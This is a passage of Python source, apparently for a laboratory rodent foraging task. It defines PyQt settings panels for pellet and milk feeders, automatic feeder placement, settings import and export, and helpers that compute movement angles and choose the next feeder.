    hbox.addWidget(QtWidgets.QLabel('Light Signal delay (s)'))
    self.settings['lightSignalDelay'] = QtWidgets.QLineEdit('0')
    hbox.addWidget(self.settings['lightSignalDelay'])
    grid.addLayout(set_double_h_box_stretch(hbox), 7, 0)
    # Option to set duration of negative audio feedback
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Negative Audio Feedback (s)'))
    self.settings['NegativeAudioSignal'] = QtWidgets.QLineEdit('0')
    hbox.addWidget(self.settings['NegativeAudioSignal'])
    grid.addLayout(set_double_h_box_stretch(hbox), 8, 0)
    # Specify milk trial fail penalty duration
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Milk Trial Fail Penalty (s)'))
    self.settings['MilkTrialFailPenalty'] = QtWidgets.QLineEdit('10')
    hbox.addWidget(self.settings['MilkTrialFailPenalty'])
    grid.addLayout(set_double_h_box_stretch(hbox), 9, 0)
    # Specify milk trial mean separation
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Min Separation (s)'))
    self.settings['MilkTrialMinSeparationMean'] = QtWidgets.QLineEdit('40')
    hbox.addWidget(self.settings['MilkTrialMinSeparationMean'])
    grid.addLayout(set_double_h_box_stretch(hbox), 0, 1)
    # Specify milk trial separation variance
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Min Separation variance (%)'))
    self.settings['MilkTrialMinSeparationVariance'] = QtWidgets.QLineEdit('0.5')
    hbox.addWidget(self.settings['MilkTrialMinSeparationVariance'])
    grid.addLayout(set_double_h_box_stretch(hbox), 1, 1)
    # Specify minimum distance to feeder for starting a trial
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Minimum Start Distance (cm)'))
    self.settings['MilkTaskMinStartDistance'] = QtWidgets.QLineEdit('50')
    hbox.addWidget(self.settings['MilkTaskMinStartDistance'])
    grid.addLayout(set_double_h_box_stretch(hbox), 2, 1)
    # Specify minimum angular distance to goal for starting a trial
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Minimum Goal angular distance (deg)'))
    self.settings['MilkTaskMinGoalAngularDistance'] = QtWidgets.QLineEdit('45')
    hbox.addWidget(self.settings['MilkTaskMinGoalAngularDistance'])
    grid.addLayout(set_double_h_box_stretch(hbox), 3, 1)
    # Specify position history period for computing goal angular distance
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Goal angular distance time (s)'))
    self.settings['MilkTaskGoalAngularDistanceTime'] = QtWidgets.QLineEdit('2')
    hbox.addWidget(self.settings['MilkTaskGoalAngularDistanceTime'])
    grid.addLayout(set_double_h_box_stretch(hbox), 4, 1)
    # Specify minimum distance to goal feeder for ending the trial
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Minimum Goal Distance (cm)'))
    self.settings['MilkTaskMinGoalDistance'] = QtWidgets.QLineEdit('10')
    hbox.addWidget(self.settings['MilkTaskMinGoalDistance'])
    grid.addLayout(set_double_h_box_stretch(hbox), 5, 1)
    # Specify maximum trial duration
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Maximum Trial Duration (s)'))
    self.settings['MilkTrialMaxDuration'] = QtWidgets.QLineEdit('9')
    hbox.addWidget(self.settings['MilkTrialMaxDuration'])
    grid.addLayout(set_double_h_box_stretch(hbox), 6, 1)
    # Specify method of choosing the next milk feeder
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Next Goal'))
    self.settings['MilkGoalNextFeederMethod'] = {'random': QtWidgets.QRadioButton('Random'),
                                                 'weighted': QtWidgets.QRadioButton('Weighted'),
                                                 'cycle': QtWidgets.QRadioButton('Cycle')}
    self.settings['MilkGoalNextFeederMethod']['cycle'].setChecked(True)
    hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['random'])
    hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['weighted'])
    hbox.addWidget(self.settings['MilkGoalNextFeederMethod']['cycle'])
    self.button_groups['MilkGoalNextFeederMethod'] = QtWidgets.QButtonGroup()
    self.button_groups['MilkGoalNextFeederMethod'].addButton(
        self.settings['MilkGoalNextFeederMethod']['random'])
    self.button_groups['MilkGoalNextFeederMethod'].addButton(
        self.settings['MilkGoalNextFeederMethod']['weighted'])
    self.button_groups['MilkGoalNextFeederMethod'].addButton(
        self.settings['MilkGoalNextFeederMethod']['cycle'])
    grid.addLayout(set_quadruple_h_box_stretch(hbox), 7, 1)
    # Specify number of repretitions of each milk trial goal
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Milk goal repetitions'))
    self.settings['MilkGoalRepetition'] = QtWidgets.QLineEdit('0')
    hbox.addWidget(self.settings['MilkGoalRepetition'])
    grid.addLayout(set_double_h_box_stretch(hbox), 8, 1)
    # Create Milk FEEDER items
    scroll_widget = QtWidgets.QWidget()
    self.milk_feeder_settings_layout = QtWidgets.QVBoxLayout(scroll_widget)
    self.addMilkFeederButton = QtWidgets.QPushButton('Add FEEDER')
    self.addMilkFeederButton.clicked.connect(lambda: self.addFeedersToList('milk'))
    self.milk_feeder_settings_layout.addWidget(self.addMilkFeederButton)
    scroll = QtWidgets.QScrollArea()
    scroll.setWidget(scroll_widget)
    scroll.setWidgetResizable(True)
    vbox.addWidget(scroll)
    # Add Milk Task settings to task specific settings layout
    frame = QtWidgets.QFrame()
    frame.setLayout(vbox)
    frame.setFrameStyle(3)
    # Set minimum size for frame
    frame.setMinimumSize(800, 800)
    return frame
def autoFeederPosition(self, target_feeder, max_attempts=1000):
    """Randomly pick a position and angle for target_feeder and write them
    into its GUI boxes.

    A candidate position must be at least 'Clearence' cm from the arena
    boundaries and at least max('Spacing' of either feeder) cm from every
    other milk feeder. If no candidate passes within max_attempts samples,
    a message is shown instead.
    """
    min_spacing = np.int64(float(target_feeder['Spacing'].text()))
    min_clearence = np.int64(float(target_feeder['Clearence'].text()))
    # Gather positions and spacing requirements of all other milk feeders
    other_positions = []
    other_spacings = []
    for feeder_box in self.settings['FEEDERs']['milk']:
        if feeder_box is target_feeder:
            continue
        coords = np.array(list(map(float, str(feeder_box['Position'].text()).split(',')))).astype(np.float64)
        other_positions.append(coords)
        other_spacings.append(float(str(feeder_box['Spacing'].text())))
    # Rejection-sample uniformly across the arena until a candidate passes
    candidate_ok = False
    for _ in range(max_attempts):
        candidate = np.array([random.random() * self.arena_size[0],
                              random.random() * self.arena_size[1]], dtype=np.int64)
        # Reject candidates too close to the arena boundaries
        candidate_ok = distance_from_boundaries(candidate, self.arena_size) >= min_clearence
        if candidate_ok:
            # Reject candidates too close to any other feeder
            for coords, spacing in zip(other_positions, other_spacings):
                separation = euclidean(candidate, coords)
                if separation < min_spacing or separation < spacing:
                    candidate_ok = False
                    break
        if candidate_ok:
            break
    if candidate_ok:
        # Write accepted position (as 'x,y' ints) and a random orientation
        target_feeder['Position'].setText(','.join(map(str, map(int, list(candidate)))))
        target_feeder['Angle'].setText(str(int(round(random.random() * 360.0))))
    else:
        show_message('Could not find a position matching the criteria.')
def addFeedersToList(self, feeder_type, FEEDER_settings=None):
    """Append a FEEDER control group to the GUI list of the given type.

    feeder_type     - str - 'pellet' or 'milk'; milk feeders get extra
                      position/spacing/angle and audio-signal controls.
    FEEDER_settings - dict or None - previously saved values; when None,
                      the hard-coded defaults below are used.

    The created widget references are stored in a FEEDER dict and appended
    to self.settings['FEEDERs'][feeder_type] for later export.
    """
    if FEEDER_settings is None:
        FEEDER_settings = {'ID': '1',
                           'Present': True,
                           'Active': True,
                           'IP': '192.168.0.40',
                           'Position': np.array([100,50]),
                           'Angle': np.array(0),
                           'Spacing': np.array(60),
                           'Clearence': np.array(20),
                           'SignalHz': np.array(10000),
                           'SignalHzWidth': np.array(500),
                           'ModulHz': np.array(4)}
    # Create interface for interacting with this FEEDER
    # NOTE: the lambdas below capture this call's FEEDER dict, so each
    # feeder row's buttons act on its own widgets.
    FEEDER = {'Type': feeder_type}
    vbox = QtWidgets.QVBoxLayout()
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('ID:'))
    FEEDER['ID'] = QtWidgets.QLineEdit(FEEDER_settings['ID'])
    FEEDER['ID'].setMaximumWidth(40)
    hbox.addWidget(FEEDER['ID'])
    hbox.addWidget(QtWidgets.QLabel('IP:'))
    FEEDER['IP'] = QtWidgets.QLineEdit(FEEDER_settings['IP'])
    FEEDER['IP'].setMinimumWidth(105)
    hbox.addWidget(FEEDER['IP'])
    activateButton = QtWidgets.QPushButton('Activate')
    activateButton.setMinimumWidth(70)
    activateButton.setMaximumWidth(70)
    FEEDER['ReleaseQuantity'] = QtWidgets.QLineEdit('1')
    FEEDER['ReleaseQuantity'].setMaximumWidth(40)
    activateButton.clicked.connect(lambda: activate_feeder(feeder_type, FEEDER['IP'],
                                                           self.settings['Username'],
                                                           self.settings['Password'],
                                                           FEEDER['ReleaseQuantity']))
    hbox.addWidget(activateButton)
    hbox.addWidget(FEEDER['ReleaseQuantity'])
    vbox.addLayout(hbox)
    hbox = QtWidgets.QHBoxLayout()
    FEEDER['Present'] = QtWidgets.QCheckBox('Present')
    FEEDER['Present'].setChecked(FEEDER_settings['Present'])
    hbox.addWidget(FEEDER['Present'])
    FEEDER['Active'] = QtWidgets.QCheckBox('Active')
    FEEDER['Active'].setChecked(FEEDER_settings['Active'])
    hbox.addWidget(FEEDER['Active'])
    hbox.addWidget(QtWidgets.QLabel('Position:'))
    FEEDER['Position'] = QtWidgets.QLineEdit(','.join(map(str, FEEDER_settings['Position'])))
    FEEDER['Position'].setMinimumWidth(70)
    FEEDER['Position'].setMaximumWidth(70)
    hbox.addWidget(FEEDER['Position'])
    vbox.addLayout(hbox)
    if feeder_type == 'milk':
        hbox = QtWidgets.QHBoxLayout()
        # Add minimum spacing betwen feeders
        hbox.addWidget(QtWidgets.QLabel('Spacing:'))
        FEEDER['Spacing'] = QtWidgets.QLineEdit(str(FEEDER_settings['Spacing']))
        FEEDER['Spacing'].setMinimumWidth(40)
        FEEDER['Spacing'].setMaximumWidth(40)
        hbox.addWidget(FEEDER['Spacing'])
        # Add minimum clearence from boundaries
        hbox.addWidget(QtWidgets.QLabel('Clearence:'))
        FEEDER['Clearence'] = QtWidgets.QLineEdit(str(FEEDER_settings['Clearence']))
        FEEDER['Clearence'].setMinimumWidth(40)
        FEEDER['Clearence'].setMaximumWidth(40)
        hbox.addWidget(FEEDER['Clearence'])
        # Add angular position to specify feeder orientation
        hbox.addWidget(QtWidgets.QLabel('Angle:'))
        FEEDER['Angle'] = QtWidgets.QLineEdit(str(FEEDER_settings['Angle']))
        FEEDER['Angle'].setMinimumWidth(60)
        FEEDER['Angle'].setMaximumWidth(60)
        hbox.addWidget(FEEDER['Angle'])
        # Add a button to automatically select feeder orientation and angle
        autoPosButton = QtWidgets.QPushButton('AutoPos')
        autoPosButton.setMinimumWidth(70)
        autoPosButton.setMaximumWidth(70)
        autoPosButton.clicked.connect(lambda: self.autoFeederPosition(FEEDER))
        hbox.addWidget(autoPosButton)
        # Finish this row of options
        vbox.addLayout(hbox)
        # Add sound signal values
        hbox = QtWidgets.QHBoxLayout()
        hbox.addWidget(QtWidgets.QLabel('Signal (Hz):'))
        FEEDER['SignalHz'] = QtWidgets.QLineEdit(str(FEEDER_settings['SignalHz']))
        hbox.addWidget(FEEDER['SignalHz'])
        hbox.addWidget(QtWidgets.QLabel('W:'))
        # Backwards-compatibility shim for settings saved before
        # SignalHzWidth existed; remove once all settings files are resaved.
        if not 'SignalHzWidth' in FEEDER_settings.keys():
            print('Remove this section in Pellets_and_Milk_Task.py when settings resaved!')
            FEEDER_settings['SignalHzWidth'] = np.array(500)
        FEEDER['SignalHzWidth'] = QtWidgets.QLineEdit(str(FEEDER_settings['SignalHzWidth']))
        hbox.addWidget(FEEDER['SignalHzWidth'])
        hbox.addWidget(QtWidgets.QLabel('M:'))
        FEEDER['ModulHz'] = QtWidgets.QLineEdit(str(FEEDER_settings['ModulHz']))
        hbox.addWidget(FEEDER['ModulHz'])
        playSignalButton = QtWidgets.QPushButton('Play')
        playSignalButton.setMaximumWidth(40)
        playSignalButton.clicked.connect(lambda: play_audio_signal(FEEDER['SignalHz'],
                                                                   FEEDER['SignalHzWidth'],
                                                                   FEEDER['ModulHz']))
        hbox.addWidget(playSignalButton)
        vbox.addLayout(hbox)
    frame = QtWidgets.QFrame()
    frame.setLayout(vbox)
    frame.setFrameStyle(3)
    if feeder_type == 'milk':
        frame.setMaximumHeight(160)
    else:
        frame.setMaximumHeight(90)
    if feeder_type == 'pellet':
        self.pellet_feeder_settings_layout.addWidget(frame)
    elif feeder_type == 'milk':
        self.milk_feeder_settings_layout.addWidget(frame)
    self.settings['FEEDERs'][feeder_type].append(FEEDER)
def export_settings_from_gui(self):
    """Collect all task settings from the GUI widgets into a plain dict.

    Returns:
        TaskSettings dict with numpy scalar/array values, plus nested dicts
        for 'games_active', 'MilkQuantity', 'LightSignalOnRepetitions' and
        'FEEDERs'.

    Raises:
        ValueError if two feeders of the same type share an ID.
    """
    # Get task settings from text boxes
    TaskSettings = {'LastTravelTime': np.float64(str(self.settings['LastTravelTime'].text())),
                    'LastTravelSmooth': np.int64(float(str(self.settings['LastTravelSmooth'].text()))),
                    'LastTravelDist': np.int64(float(str(self.settings['LastTravelDist'].text()))),
                    'PelletMilkRatio': np.float64(str(self.settings['PelletMilkRatio'].text())),
                    'Chewing_TTLchan': np.int64(float(str(self.settings['Chewing_TTLchan'].text()))),
                    'MilkGoalRepetition': np.int64(float(str(self.settings['MilkGoalRepetition'].text()))),
                    'Username': str(self.settings['Username'].text()),
                    'Password': str(self.settings['Password'].text()),
                    'NegativeAudioSignal': np.float64(str(self.settings['NegativeAudioSignal'].text())),
                    'lightSignalProbability': np.float64(str(self.settings['lightSignalProbability'].text())),
                    # BUGFIX: parse via float() first like every other integer field,
                    # so decimal input (e.g. '99.5') does not crash the int conversion
                    'lightSignalIntensity': np.int64(float(str(self.settings['lightSignalIntensity'].text()))),
                    'lightSignalDelay': np.float64(str(self.settings['lightSignalDelay'].text())),
                    'lightSignalPins': str(self.settings['lightSignalPins'].text()),
                    'InitPellets': np.int64(float(str(self.settings['InitPellets'].text()))),
                    'PelletQuantity': np.int64(float(str(self.settings['PelletQuantity'].text()))),
                    'PelletRewardMinSeparationMean': np.int64(float(str(self.settings['PelletRewardMinSeparationMean'].text()))),
                    'PelletRewardMinSeparationVariance': np.float64(str(self.settings['PelletRewardMinSeparationVariance'].text())),
                    'Chewing_Target': np.int64(float(str(self.settings['Chewing_Target'].text()))),
                    'MaxInactivityDuration': np.int64(float(str(self.settings['MaxInactivityDuration'].text()))),
                    'MilkTrialFailPenalty': np.int64(float(str(self.settings['MilkTrialFailPenalty'].text()))),
                    'InitMilk': np.float64(str(self.settings['InitMilk'].text())),
                    'MilkTrialMinSeparationMean': np.int64(float(str(self.settings['MilkTrialMinSeparationMean'].text()))),
                    'MilkTrialMinSeparationVariance': np.float64(str(self.settings['MilkTrialMinSeparationVariance'].text())),
                    'MilkTaskMinStartDistance': np.int64(float(str(self.settings['MilkTaskMinStartDistance'].text()))),
                    'MilkTaskMinGoalDistance': np.int64(float(str(self.settings['MilkTaskMinGoalDistance'].text()))),
                    'MilkTaskMinGoalAngularDistance': np.int64(float(str(self.settings['MilkTaskMinGoalAngularDistance'].text()))),
                    'MilkTaskGoalAngularDistanceTime': np.float64(float(str(self.settings['MilkTaskGoalAngularDistanceTime'].text()))),
                    'MilkTrialMaxDuration': np.int64(float(str(self.settings['MilkTrialMaxDuration'].text())))}
    # Get boolean selection for Active Game settings
    TaskSettings['games_active'] = {}
    for key in self.settings['games_active'].keys():
        state = self.settings['games_active'][key].isChecked()
        TaskSettings['games_active'][key] = np.array(state)
    # Get milk reward quantity options
    TaskSettings['MilkQuantity'] = {}
    for key in self.settings['MilkQuantity']:
        TaskSettings['MilkQuantity'][key] = np.float64(str(self.settings['MilkQuantity'][key].text()))
    # Get radio button selection
    for key in self.settings['AudioSignalMode'].keys():
        if self.settings['AudioSignalMode'][key].isChecked():
            TaskSettings['AudioSignalMode'] = key
    for key in self.settings['MilkGoalNextFeederMethod'].keys():
        if self.settings['MilkGoalNextFeederMethod'][key].isChecked():
            TaskSettings['MilkGoalNextFeederMethod'] = key
    # Get boolean selection for LightSignal repetition trial settings
    TaskSettings['LightSignalOnRepetitions'] = {}
    for key in self.settings['LightSignalOnRepetitions'].keys():
        state = self.settings['LightSignalOnRepetitions'][key].isChecked()
        TaskSettings['LightSignalOnRepetitions'][key] = np.array(state)
    # Get FEEDER specific information
    FEEDERs = {}
    for feeder_type in self.settings['FEEDERs'].keys():
        if len(self.settings['FEEDERs'][feeder_type]) > 0:
            FEEDERs[feeder_type] = {}
            IDs = []
            for feeder in self.settings['FEEDERs'][feeder_type]:
                IDs.append(str(int(str(feeder['ID'].text()))))
                FEEDERs[feeder_type][IDs[-1]] = {'ID': IDs[-1],
                                                 'Present': np.array(feeder['Present'].isChecked()),
                                                 'Active': np.array(feeder['Active'].isChecked()),
                                                 'IP': str(feeder['IP'].text()),
                                                 'Position': np.array(list(map(int, str(feeder['Position'].text()).split(','))))}
                if feeder_type == 'milk':
                    FEEDERs[feeder_type][IDs[-1]]['Spacing'] = np.int64(float(str(feeder['Spacing'].text())))
                    FEEDERs[feeder_type][IDs[-1]]['Clearence'] = np.int64(float(str(feeder['Clearence'].text())))
                    FEEDERs[feeder_type][IDs[-1]]['Angle'] = np.int64(float(str(feeder['Angle'].text())))
                    FEEDERs[feeder_type][IDs[-1]]['SignalHz'] = np.int64(float(str(feeder['SignalHz'].text())))
                    FEEDERs[feeder_type][IDs[-1]]['SignalHzWidth'] = np.int64(float(str(feeder['SignalHzWidth'].text())))
                    FEEDERs[feeder_type][IDs[-1]]['ModulHz'] = np.int64(float(str(feeder['ModulHz'].text())))
            # Check if there are duplicates of FEEDER IDs
            # (duplicates silently overwrite each other above, so refuse to export)
            if any(IDs.count(ID) > 1 for ID in IDs):
                raise ValueError('Duplicates of IDs in ' + feeder_type + ' feeders!')
        else:
            show_message('No ' + feeder_type + ' FEEDERs entered.')
    TaskSettings['FEEDERs'] = FEEDERs
    return TaskSettings
def import_settings_to_gui(self, TaskSettings):
    """Populate the GUI widgets from a TaskSettings dict.

    Inverse of export_settings_from_gui(). A setting that fails to load is
    reported on stdout but does not abort loading the remaining settings.
    """
    # Load all settings
    for key in TaskSettings.keys():
        try:
            if isinstance(TaskSettings[key], np.ndarray) and TaskSettings[key].dtype == 'bool':
                self.settings[key].setChecked(TaskSettings[key])
            elif key == 'games_active':
                for repeat_key in TaskSettings['games_active'].keys():
                    state = TaskSettings['games_active'][repeat_key]
                    self.settings['games_active'][repeat_key].setChecked(state)
            elif key == 'AudioSignalMode':
                for mode_key in self.settings['AudioSignalMode'].keys():
                    if TaskSettings['AudioSignalMode'] == mode_key:
                        self.settings['AudioSignalMode'][mode_key].setChecked(True)
            elif key == 'MilkGoalNextFeederMethod':
                for mode_key in self.settings['MilkGoalNextFeederMethod'].keys():
                    if TaskSettings['MilkGoalNextFeederMethod'] == mode_key:
                        self.settings['MilkGoalNextFeederMethod'][mode_key].setChecked(True)
            elif key == 'LightSignalOnRepetitions':
                for repeat_key in TaskSettings['LightSignalOnRepetitions'].keys():
                    state = TaskSettings['LightSignalOnRepetitions'][repeat_key]
                    self.settings['LightSignalOnRepetitions'][repeat_key].setChecked(state)
            elif key == 'FEEDERs':
                for feeder_type in TaskSettings['FEEDERs'].keys():
                    for ID in sorted(TaskSettings['FEEDERs'][feeder_type].keys(), key=int):
                        FEEDER_settings = TaskSettings['FEEDERs'][feeder_type][ID]
                        self.addFeedersToList(feeder_type, FEEDER_settings)
            elif isinstance(TaskSettings[key], dict):
                for sub_key in TaskSettings[key]:
                    self.settings[key][sub_key].setText(str(TaskSettings[key][sub_key]))
            elif key in self.settings.keys():
                self.settings[key].setText(str(TaskSettings[key]))
        except Exception as e:
            # BUGFIX: was a bare `except:` which also trapped SystemExit and
            # KeyboardInterrupt, and discarded the actual error. Report both
            # the failing key and the exception instead.
            print('Failed to load setting: ' + str(key) + ' (' + repr(e) + ')')
def smooth_edge_padding(data, smoothing):
    """
    Smooth a 1-D array with a box-car (moving-average) filter of width
    `smoothing`, then edge-pad the result back to the original length.

    data      - 1-D numpy array
    smoothing - int - averaging window size (must be <= data.size)

    Returns a numpy array of the same length as `data`.
    """
    originalSize = data.size
    # 'valid' convolution shortens the array by (smoothing - 1) samples
    data = np.convolve(data, np.ones((smoothing,))/smoothing, mode='valid')
    missing = originalSize - data.size
    # Split the missing samples between the two ends (extra one at the end)
    addStart = int(np.floor(missing / 2.0))
    addEnd = int(np.ceil(missing / 2.0))
    # np.pad replaces the deprecated np.lib.pad alias (removed in NumPy 2.0)
    data = np.pad(data, (addStart, addEnd), 'edge')
    return data
def compute_distance_travelled(posHistory, smoothing):
    """
    Return the total path length (sum of consecutive step distances) of a
    position history, after box-car smoothing the x and y coordinates.

    posHistory - sequence of position samples; only columns 0 and 1 (x, y)
                 are used
    smoothing  - int - window size passed to smooth_edge_padding

    NOTE(review): if posHistory has an integer dtype the smoothed values are
    truncated when assigned back in place — presumably positions are floats;
    verify against the caller.
    """
    posHistory = np.array(posHistory)
    posHistory = posHistory[:, :2]
    posHistory[:, 0] = smooth_edge_padding(posHistory[:, 0], smoothing)
    posHistory[:, 1] = smooth_edge_padding(posHistory[:, 1], smoothing)
    # Vectorized replacement for the per-sample euclidean() loop:
    # step vectors between consecutive samples, then their L2 norms summed.
    steps = np.diff(posHistory, axis=0)
    return np.sum(np.sqrt(np.sum(steps ** 2, axis=1)))
def unit_vector(vector):
    """Return *vector* scaled to unit (L2) length."""
    norm = np.linalg.norm(vector)
    return vector / norm
def angle_between(v1, v2):
    """ Returns the angle in radians between vectors 'v1' and 'v2'::
            >>> angle_between((1, 0, 0), (0, 1, 0))
            1.5707963267948966
            >>> angle_between((1, 0, 0), (1, 0, 0))
            0.0
            >>> angle_between((1, 0, 0), (-1, 0, 0))
            3.141592653589793
    """
    # Normalize both vectors, then take the arccos of their dot product.
    # The clip guards against floating-point drift just outside [-1, 1].
    u = v1 / np.linalg.norm(v1)
    w = v2 / np.linalg.norm(v2)
    cos_angle = np.clip(np.dot(u, w), -1.0, 1.0)
    return np.arccos(cos_angle)
def compute_mean_movement_vector(posHistory):
    """Return the mean per-step (x, y) displacement over a position history.

    Only the first two columns of each sample are used; NaN steps are
    ignored via nanmean.
    """
    xy = np.array(posHistory)[:, :2]
    step_vectors = np.diff(xy, axis=0)
    return np.nanmean(step_vectors, axis=0)
def compute_mean_posHistory(posHistory):
    """Return the NaN-ignoring mean (x, y) position of a position history."""
    xy = np.array(posHistory)[:, :2]
    return np.nanmean(xy, axis=0)
def compute_movement_angular_distance_to_target(posHistory, target_location):
    """
    Computes angular distance between mean movement vector and direct path to target location.
    Outputs None if norm of mean movement vector is 0.
    """
    movement = compute_mean_movement_vector(posHistory)
    # Guard clause: no net movement (or NaN norm) means direction is undefined.
    if not (np.linalg.norm(movement) > 0):
        return None
    to_target = target_location - posHistory[-1][:2]
    return np.rad2deg(angle_between(movement, to_target))
def draw_rect_with_border(surface, fill_color, outline_color, position, border=1):
    """Fill a rectangle at *position* with fill_color, leaving an
    outline_color border of *border* pixels around it."""
    outer = pygame.Rect(position)
    inner = outer.inflate(-2 * border, -2 * border)
    surface.fill(outline_color, outer)
    surface.fill(fill_color, inner)
class PelletChoice(object):
    """
    Selects the next feeder using positional occupancy.
    Query read PelletChoice.ID for current feeder.
    Use PelletChoice.next() method to choose next feeder.
    """
    def __init__(self, PelletRewardDevices, position_histogram_array, position_histogram_dict, arena_size):
        # PelletRewardDevices      - object providing .IDs_active and .positions (used below)
        # position_histogram_array - flat occupancy counts, reshaped in next()
        #                            using position_histogram_dict['array_shape']
        # position_histogram_dict  - dict with 'parameters', 'edges' and 'array_shape'
        # arena_size               - (width, height); bins outside it are cropped
        self.PelletRewardDevices = PelletRewardDevices
        self.position_histogram_array = position_histogram_array
        self.position_histogram_dict = position_histogram_dict
        self.arena_size = arena_size
        # Pick an initial feeder so self.ID is available immediately
        self.next()
    def _compute_position_histogram_nearest_feeders(self, IDs_active):
        """Precompute which active feeder is nearest to each histogram bin
        inside the arena. Inputs are remembered in self.old_* so the result
        can be reused until feeders or histogram parameters change."""
        self.old_IDs_active = IDs_active
        # Get feeder locations
        FEEDER_Locs = []
        for ID in IDs_active:
            FEEDER_Locs.append(np.array(self.PelletRewardDevices.positions[ID], dtype=np.float32))
        # Get occupancy histogram information from position_histogram_dict
        self.old_PelletHistogramParameters = deepcopy(self.position_histogram_dict['parameters'])
        self.histogramPfeederMap = {}
        # Convert histogram edges to bin centers
        histXedges = self.position_histogram_dict['edges']['x']
        histYedges = self.position_histogram_dict['edges']['y']
        histXbin = (histXedges[1:] + histXedges[:-1]) / 2
        histYbin = (histYedges[1:] + histYedges[:-1]) / 2
        # Crop data to only include parts inside the arena boundaries
        idx_X = np.logical_and(0 < histXbin, histXbin < self.arena_size[0])
        idx_Y = np.logical_and(0 < histYbin, histYbin < self.arena_size[1])
        histXbin = histXbin[idx_X]
        histYbin = histYbin[idx_Y]
        # Index grids used in next() to crop the occupancy map to arena bins
        self.histogramPfeederMap['idx_crop_X'] = np.repeat(np.where(idx_X)[0][None, :],
                                                           histYbin.size, axis=0)
        self.histogramPfeederMap['idx_crop_Y'] = np.repeat(np.where(idx_Y)[0][:, None],
                                                           histXbin.size, axis=1)
        # Find closest feeder for each spatial bin
        histFeeder = np.zeros((histYbin.size, histXbin.size), dtype=np.int16)
        for xpos in range(histXbin.size):
            for ypos in range(histYbin.size):
                pos = np.array([histXbin[xpos], histYbin[ypos]], dtype=np.float32)
                dists = np.zeros(len(IDs_active), dtype=np.float32)
                for n_feeder in range(len(IDs_active)):
                    dists[n_feeder] = np.linalg.norm(FEEDER_Locs[n_feeder] - pos)
                histFeeder[ypos, xpos] = np.argmin(dists)
        self.histogramPfeederMap['feeder_map'] = histFeeder
    def _ensure_nearest_feeder_map_valid(self, IDs_active):
        """Recompute the nearest-feeder map if the histogram parameters or
        the set of active feeders has changed since the last computation."""
        histparam = deepcopy(self.position_histogram_dict['parameters'])
        histogram_same = hasattr(self, 'old_PelletHistogramParameters') and \
                         self.old_PelletHistogramParameters == histparam
        feeders_same = hasattr(self, 'old_IDs_active') and \
                       self.old_IDs_active == IDs_active
        if not histogram_same or not feeders_same:
            self._compute_position_histogram_nearest_feeders(IDs_active)
    @staticmethod
    def weighted_randomness(weights):
        """Return a random index into weights, favouring LOWER weights:
        each entry's probability is proportional to (sum(weights) - weight)**2."""
        relative_weights = (np.sum(weights) - weights) ** 2
        probability = relative_weights / np.sum(relative_weights)
        return np.random.choice(len(probability), p=probability)
    def next(self):
        """
        Uses relative mean occupancy in bins closest to each feeder
        to increase probability of selecting feeder with lower mean occupancy.
        """
        IDs_active = copy(self.PelletRewardDevices.IDs_active)
        self._ensure_nearest_feeder_map_valid(IDs_active)
        if len(IDs_active) > 1:
            # Get occupancy information from position_histogram_dict
            histmap = np.reshape(self.position_histogram_array,
                                 self.position_histogram_dict['array_shape'])
            # Crop histogram to relevant parts
            histmap = histmap[self.histogramPfeederMap['idx_crop_Y'], self.histogramPfeederMap['idx_crop_X']]
            # Find mean occupancy in bins nearest to each feeder
            feeder_bin_occupancy = np.zeros(len(IDs_active), dtype=np.float64)
            for n_feeder in range(len(IDs_active)):
                bin_occupancies = histmap[self.histogramPfeederMap['feeder_map'] == n_feeder]
                feeder_bin_occupancy[n_feeder] = np.mean(bin_occupancies)
            # Choose feeder with weighted randomness if any parts occupied
            if np.any(feeder_bin_occupancy > 0):
                n_feeder = PelletChoice.weighted_randomness(feeder_bin_occupancy)
            else:
                n_feeder = np.random.choice(len(IDs_active))
        else:
            n_feeder = 0
        # Update current feeder ID
        self.ID = IDs_active[n_feeder]
        return self.ID
class MilkGoal(object):
    """
    Determines the sequence of milk feeder goal decisions.
    Read MilkGoal.ID for the current goal feeder.
    Use MilkGoal.next() method to choose the next feeder.
    """
    def __init__(self, activeMfeeders, next_feeder_method='random', repetitions=0):
        """
        activeMfeeders - list - elements are returned with next() method as choices
        next_feeder_method - str - 'random' (default), 'weighted' or 'cycle'
        repetitions - int - number of repetitions to do per each feeder
        """
        self.activeMfeeders = activeMfeeders
        self.next_feeder_method = next_feeder_method
        self.repetitions = repetitions
        if self.next_feeder_method == 'cycle':
            self._initialize_sequence()
            self.next()
        elif self.next_feeder_method == 'weighted':
            # No game performance data is available at startup, so the first
            # goal is chosen uniformly at random.
            self.ID = self.activeMfeeders[MilkGoal.choose_randomly(self.activeMfeeders)]
        elif self.next_feeder_method == 'random':
            self.next()
        else:
            raise ValueError('Unexpected next_feeder_method argument.')
    def _initialize_sequence(self):
        """
        Initializes the shuffled sequence of feeders and the sequence position.
        """
        if self.next_feeder_method == 'cycle':
            # list() is required so np.random.shuffle can shuffle in place
            # (shuffling a range object fails on Python 3).
            self.sequence = list(range(len(self.activeMfeeders)))
            np.random.shuffle(self.sequence)
            # Set repetition counter to its maximum and position to the very
            # last index in the sequence, so that the first call to next()
            # method starts the sequence from the beginning.
            # BUGFIX: position must be the last index (len - 1); the previous
            # value of len(...) made the first next() call wrap to index 1,
            # skipping the first feeder in the shuffled sequence.
            self.repetition_counter = self.repetitions
            self.sequence_position = len(self.activeMfeeders) - 1
    def re_init(self, activeMfeeders=None, next_feeder_method=None, repetitions=None):
        """
        Allows re-initializing the class with any subset of input variables.
        """
